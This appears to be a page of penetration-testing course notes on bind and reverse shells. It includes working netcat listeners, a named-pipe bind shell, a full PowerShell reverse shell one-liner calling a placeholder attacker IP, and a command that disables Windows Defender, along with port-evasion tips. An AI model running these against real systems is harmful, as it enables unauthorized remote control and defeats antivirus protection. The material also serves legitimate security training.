Shells & Payloads: Shell Overview

Introduction

  • Shell Definition: Programs providing CLI (Command Line Interface) access to systems

    • Common terminology: "catching" or "popping" a shell = successful remote access

    • Primary goal: Obtain interactive system control for:

      • Privilege escalation

      • System pivoting

      • File transfers

      • Persistence establishment

Shell Types Overview

1. Bind Shells

  • Definition: Listener running on target system awaiting attacker connection

  • Key Characteristics:

    • Requires target to run listener

    • Often blocked by firewalls

    • Best suited for internal network testing

Basic Bind Shell Setup

# On target system (listener):
nc -lvnp 7777

# On attacker system (client):
nc -nv <target-IP> 7777

Interactive Bind Shell Setup

# On target system:
rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc -l <target-IP> 7777 > /tmp/f

2. Reverse Shells

  • Definition: Target initiates connection to attacker's system

  • Advantages:

    • Better firewall bypass (uses outbound connections)

    • More successful in real-world scenarios

    • Easier to maintain persistence

Basic Reverse Shell Setup

# On attacker system (listener):
sudo nc -lvnp 443

# On Windows target (PowerShell):
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('<attacker-IP>',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

Shell Environment Identification

Common Terminal Emulators

  • Windows: Windows Terminal, cmder, PuTTY

  • Linux: xterm, GNOME Terminal, Konsole

  • MacOS: Terminal, iTerm2

  • Cross-platform: kitty, Alacritty

Shell Recognition Commands

# View current shell process
ps

# Check shell environment variables
env | grep SHELL

Best Practices & Tips

1. Port Selection

  • Use common ports for better evasion:

    • 443 (HTTPS)

    • 80 (HTTP)

    • Avoid suspicious uncommon ports

2. Antivirus Evasion

# Disable Windows Defender (if needed)
Set-MpPreference -DisableRealtimeMonitoring $true

3. Firewall Considerations

  • Bind shells:

    • Require incoming connections

    • Often blocked by firewalls

    • Best for internal testing

  • Reverse shells:

    • Use outbound connections

    • Better success rate

    • Preferred for external testing

4. Shell Stabilization

  • Consider using:

    • Named pipes for persistence

    • Error handling for stability

    • Proper cleanup after session

Payload Types

  • Network data packets

  • Programming instructions

  • Various malware forms

  • Command execution scripts

Security Implications

  • Shells provide direct OS access

  • Enable system command control

  • Facilitate data exfiltration

  • Allow privilege escalation

  • Support lateral movement

Quick Reference

Common Shell Indicators

  • $ prompt = Bash/Ksh/POSIX shell

  • > prompt = Windows CMD

  • PS> prompt = PowerShell

Key Commands Cheatsheet

# Basic listener
nc -lvnp <port>

# Basic connection
nc -nv <IP> <port>

# Check current shell
echo $SHELL

# Create named pipe
mkfifo /tmp/f
PreviousFile Transfer Detection & Evasion TechniquesNextShells & Payloads: Payloads Overview